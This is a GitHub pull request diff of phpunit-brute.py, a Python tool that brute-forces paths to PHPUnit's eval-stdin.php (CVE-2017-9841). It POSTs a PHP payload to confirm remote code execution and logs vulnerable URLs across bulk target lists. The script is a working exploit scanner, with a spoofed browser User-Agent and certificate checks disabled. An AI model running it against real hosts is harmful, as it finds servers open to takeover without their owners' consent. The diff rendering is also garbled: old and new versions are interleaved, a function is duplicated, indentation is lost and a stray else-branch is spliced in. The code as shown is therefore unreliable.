Skip to content

Improve code quality #2

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
180 changes: 98 additions & 82 deletions phpunit-brute.py
Original file line number Diff line number Diff line change
@@ -1,106 +1,122 @@
#!/usr/bin/env python
#
#
#
#
# phpunit-brute.py - Finding paths to phpunit to gain RCE. (CVE-2017-9841)
#
# By @RandomRobbieBF
#
#

#
import requests
import sys
import argparse
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()


# Command-line interface: a single target URL, an optional file of URLs,
# and an optional debugging proxy.
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=False, default="http://localhost", help="URL to test")
parser.add_argument("-f", "--file", required=False, default="", help="File of urls")
parser.add_argument("-p", "--proxy", required=False, default="", help="Proxy for debugging")

args = parser.parse_args()
url = args.url
urls = args.file

# Browser-like User-Agent so probes look like ordinary traffic.
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0"

# Empty string means "no proxy" to requests.
proxy = args.proxy if args.proxy else ""



# Second copy of the CLI declaration (the diff's revised version re-declares
# the parser with explicit str types).
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", type=str, required=False,
                    default="http://localhost", help="URL to test")
parser.add_argument("-f", "--file", type=str, required=False,
                    help="File of urls")
parser.add_argument("-p", "--proxy", type=str, required=False,
                    default="", help="Proxy for debugging")

# Route every scheme through the same (possibly empty) proxy endpoint.
http_proxy = proxy
proxyDict = {scheme: http_proxy for scheme in ("http", "https", "ftp")}



def test_url(url, urlpath):
    """POST a phpinfo() payload to url + urlpath, checking for CVE-2017-9841.

    Returns True (and appends the URL to found.txt) when the response proves
    the payload executed, False otherwise.  Exits with status 1 when the HTTP
    request itself fails (bad host, timeout, refused connection, ...).
    """
    newurl = url + urlpath
    # eval-stdin.php evaluates the raw POST body as PHP (CVE-2017-9841).
    rawBody = "<?php phpinfo();"
    headers = {
        "User-Agent": USER_AGENT,
        "Connection": "close",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response = session.post(newurl, headers=headers, verify=False,
                                data=rawBody, proxies=proxyDict, timeout=30)
        # phpinfo() output always contains this license sentence, so its
        # presence in a 200 response proves the payload was executed.
        if (response.status_code == 200) and \
                ("PHP License as published by the PHP Group" in response.text):
            print("[+] Found RCE for {} [+]".format(newurl))
            with open("found.txt", "a") as text_file:
                text_file.write(newurl + "\n")
            return True
        print("[-] No Luck for {} [-]".format(urlpath))
        # Explicit False (was an implicit None) so callers get a real boolean.
        return False
    except requests.RequestException as e:
        # Narrowed from bare Exception: only transport-level failures land here.
        print("[-] Check Url might have Issues [-]")
        print(e)
        # Was sys.exit(0): a failure must not report a success exit status.
        sys.exit(1)


def test_url(url, urlpath):
    """Probe one candidate path for the phpunit eval-stdin RCE.

    Returns True on a confirmed hit (also logged to found.txt); exits the
    process if the request itself fails.
    """
    target = url + urlpath
    payload = "<?php phpinfo();"
    req_headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Connection": "close",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    try:
        resp = session.post(target, headers=req_headers, verify=False,
                            data=payload, proxies=proxyDict, timeout=30)
        # A 200 containing the PHP license sentence means phpinfo() ran.
        hit = (resp.status_code == 200
               and "PHP License as published by the PHP Group" in resp.text)
        if hit:
            print("[+] Found RCE for " + target + " [+]")
            with open("found.txt", "a") as log:
                log.write(target + "\n")
            return True
        print("[-] No Luck for " + urlpath + " [-]")
    except Exception as e:
        print("[-]Check Url might have Issues[-]")
        print(e)
        sys.exit(0)


def grab_paths(url):
    """Download the public phpunit path wordlist and try each path against url.

    Stops at the first path that yields code execution; exits the process if
    the wordlist cannot be fetched.
    """
    req_headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
    }
    try:
        wordlist = session.get(
            "https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt",
            headers=req_headers, verify=False, proxies=proxyDict)
        for candidate in wordlist.text.strip().split('\n'):
            if test_url(url, candidate):
                break
    except Exception as e:
        print("[-] Failed to obtain paths file [-]")
        print(e)
        sys.exit(0)

# NOTE(review): fragment — this is the revised grab_paths body from the diff's
# new version (its "def grab_paths(url):" header appears once above as a diff
# context line), and the paste has stripped the original indentation.
headers = {
"User-Agent": USER_AGENT,
"Connection": "close",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate"
}
try:
# Fetch the public phpunit path wordlist from GitHub.
response = session.get(
"https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt",
headers=headers,
verify=False,
proxies=proxyDict
)
lines = response.text.strip().splitlines()
# Try each candidate path; stop at the first confirmed hit.
for urlpath in lines:
loop = test_url(url, urlpath)
if loop:
break
except Exception as e:
print("[-] Failed to obtain paths file [-]")
print(e)
sys.exit(0)


# NOTE(review): old revision's top-level driver (indentation lost in the
# paste). Its matching "else: grab_paths(url)" branch is displaced further
# down by the diff interleave, so this span alone is incomplete.
if urls:
if os.path.exists(urls):
with open(urls, 'r') as f:
# One target URL per line; strip the trailing newline.
for line in f:
url = line.replace("\n","")
try:
print("Testing "+url+"")
grab_paths(url)
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
# Keep scanning the remaining URLs after any per-URL failure.
except Exception as e:
print('Error: %s' % e)
pass
# NOTE(review): redundant — the with-statement already closed the file.
f.close()

# NOTE(review): revised script entry point from the diff's new version
# (indentation lost in the paste).
if __name__ == "__main__":
args = parser.parse_args()
url = args.url
urls_file = args.file

# NOTE(review): the two lines below ("else: grab_paths(url)") are a remnant
# of the OLD revision's branch, spliced here by the diff view — they are not
# part of the new __main__ block.
else:
grab_paths(url)
session = requests.Session()
proxy = args.proxy
http_proxy = proxy
# Same proxy endpoint for every scheme; empty string disables proxying.
proxyDict = {
"http": http_proxy,
"https": http_proxy,
"ftp": http_proxy
}
try:
# File mode: test every URL listed in the file; otherwise test the one -u URL.
if urls_file and os.path.exists(urls_file):
with open(urls_file, 'r') as f:
lines = f.read().splitlines()
for line in lines:
try:
print("Testing " + url)
grab_paths(url)
except Exception as e:
print('Error: %s' % e)
pass
else:
grab_paths(url)
except KeyboardInterrupt:
print("\nCtrl-c pressed…")
sys.exit(1)